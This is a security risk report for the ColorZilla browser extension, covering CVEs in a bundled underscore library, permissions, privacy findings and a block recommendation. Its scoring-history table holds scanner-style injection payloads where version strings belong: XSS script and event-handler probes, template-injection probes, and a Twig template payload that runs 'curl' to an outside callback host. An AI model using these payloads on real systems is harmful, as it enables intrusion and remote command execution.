ColorZilla
bhlhnicpbhignbdhedgjhgdocnmhomnp
Risk Score
5.50
Risk Level:
Medium
Recommendation:
🚫 BLOCK
Top Risks
- Critical CVE-2021-23358 in bundled underscore@1.8.3 enables arbitrary code execution; not patched to fixed_in 1.12.1.
- No CSP + underscore (DOM-manipulation lib) with high/critical CVE triggers CVE v2 amplifier (×1.5), CVE pillar=7.5.
- Privacy policy admits data_collection=true and third_party_sharing=true without scoping to this extension → Privacy pillar=10.
- scripting + <all_urls> with no CSP allows content injection on every site; new Function() constructor present in injected script.
- Extension stale 25 months, MV3 but unfixed critical/high CVEs; v2 triple-stale fingerprint (>24mo + CVEs) adds Webstore risk.
Evidence
- critical_cve_bundled_lib crx underscore@1.8.3 bundles CVE-2021-23358 (critical, ACE); fixed_in 1.12.1 — library not updated.
- high_cve_bundled_lib crx underscore@1.8.3 also carries CVE-2026-27601 (high, DoS via recursion); fixed_in 1.13.8.
- no_csp_with_critical_cve crx content_security_policy is null; CVE v2 amplifier ×1.5 applies — underscore is a DOM-manipulation lib.
- privacy_policy_generic_with_sharing api Policy scope_extension=false, data_collection=true, third_party_sharing=true → v3.5 rule D: +10.0.
- function_constructor_in_content_script crx new Function() constructor found in js/content-script-combo.js injected on all URLs.
- stale_extension_with_cves store 25 months since last update; v2 calibration triple-stale (>24mo + CVEs + MV3) adds Webstore +2.0.
- broad_host_plus_scripting manifest <all_urls> host permission paired with scripting; DeveloperTools discount applied (-1.5).
- geo_diversity_3_countries crx JS hosts span IN, SG, US (3 countries); below threshold of 4 — no geo-diversity penalty.
CVE Exposures (2)
| CVE | Library | Severity | Fixed in | Summary |
|---|---|---|---|---|
| CVE-2021-23358 | underscore@1.8.3 | critical | 1.12.1 | Arbitrary Code Execution in underscore |
| CVE-2026-27601 | underscore@1.8.3 | high | 1.13.8 | Underscore has unlimited recursion in _.flatten and _.isEqual, potential for DoS |
Permissions Breakdown
- tabs medium Access to tab URLs and metadata; medium risk for a color picker.
- scripting high Programmatic script injection into pages; elevated with <all_urls>.
- storage low Local data persistence; standard for storing color history.
- offscreen low Off-screen document; low risk, used for background rendering.
- <all_urls> high Broad host access paired with scripting allows injection on every site visited.
Pillar Scores
Permissions6.50
Reputation3.50
Network3.50
Webstore2.50
Maintenance6.00
Privacy10.00
Code Quality6.50
CVE Exposure7.50
Scoring History
| fsssiedxn85fe21f1zafdsaxax><!--></ScRiPt>asddn85fe21f1zsssiedx | 6.12 | High | review | 2026-09-06 |
| sssiedn5763151bdp727562726963xsx | 5.49 | Medium | review | 2026-09-06 |
| sssiedn3f18c2e7dp727562726963xsx | 6.38 | High | block | 2026-08-30 |
| "fsssiedxa xx psssiedx | 6.34 | High | review | 2026-08-14 |
| %27fsssiedxa sssiedx | 5.79 | Medium | review | 2026-08-14 |
| fsssiedxa'sssiedx | 6.33 | High | review | 2026-08-14 |
| %27fsssiedxa$'sssiedx | 6.38 | High | review | 2026-08-13 |
| fsssiedxa"sssiedx | 6.45 | High | review | 2026-08-13 |
| v3.6"><script>Ciqy(9009)</script> | 6.02 | High | review | 2026-08-05 |
| dfb{{98991*97996}}xca | 5.36 | Medium | review | 2026-08-05 |
| <th:t="${dfb}#foreach | 5.57 | Medium | review | 2026-08-05 |
| v3.6&n957692=v957765 | 6.01 | High | review | 2026-08-05 |
| %22fsssiedxa sssiedx | 6.45 | High | block | 2026-08-04 |
| %27fsssiedxa$"sssiedx | 6.38 | High | review | 2026-08-04 |
| "fsssiedxa'sssiedx | 5.23 | Medium | review | 2026-08-04 |
| fsssiedxa$'sssiedx | 6.58 | High | block | 2026-08-04 |
| v3.6"onmouseover=315c(96782)" | 5.99 | Medium | review | 2026-08-04 |
| v3.6&n962177=v916555 | 5.22 | Medium | review | 2026-08-04 |
| <fsssiedxa"sssiedx | 5.36 | Medium | review | 2026-08-03 |
| <fsssiedxa$'sssiedx | 6.27 | High | review | 2026-08-03 |
| 'fsssiedxa xx psssiedx | 6.27 | High | block | 2026-08-03 |
| 'fsssiedxa sssiedx | 6.37 | High | block | 2026-08-03 |
| 5.76 | Medium | review | 2026-08-03 | |
| $"fsssiedxa | 5.23 | Medium | review | 2026-08-03 |
| $"fsssiedxa sssiedx | 5.18 | Medium | review | 2026-08-03 |
| fsssiedxa$"sssiedx | 6.32 | High | review | 2026-08-03 |
| v3.69199"();}]9523 | 5.40 | Medium | review | 2026-07-29 |
| dfb[[${98991*97996}]]xca | 6.18 | High | review | 2026-07-29 |
| "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") | 5.48 | Medium | review | 2026-07-29 |
| <%={{={@{#{${dfb}}%> | 5.76 | Medium | review | 2026-07-29 |
| {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hithtdjhwfdauc0baf.bxss.me")}} | 6.48 | High | block | 2026-07-29 |
| v3.6&n991828=v901020 | 6.37 | High | review | 2026-07-29 |
| <fsssiedxa'sssiedx | 5.74 | Medium | review | 2026-07-28 |
| <fsssiedxa$"sssiedx | 5.13 | Medium | review | 2026-07-28 |
| <fsssiedxa xx psssiedx | 5.34 | Medium | review | 2026-07-28 |
| <fsssiedxa"sssiedx | 6.48 | High | block | 2026-07-28 |
| <fsssiedxa'sssiedx | 5.18 | Medium | review | 2026-07-28 |
| fsssiedxa<sssiedx | 5.09 | Medium | review | 2026-07-28 |
| fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx | 5.40 | Medium | review | 2026-07-28 |
| fsssiedxa'sssiedx | 6.43 | High | review | 2026-07-28 |
| sssieddrubricxsx | 5.49 | Medium | review | 2026-07-28 |
| v3.6 | 5.50 | Medium | block | 2026-06-16 |
Bookkeeping
Rubric v3.6
Scored at 2026-06-16 07:20
Listing SHA
5645439d3b49…
Force block
— not fired
Score recovered
no
Elapsed
30.0s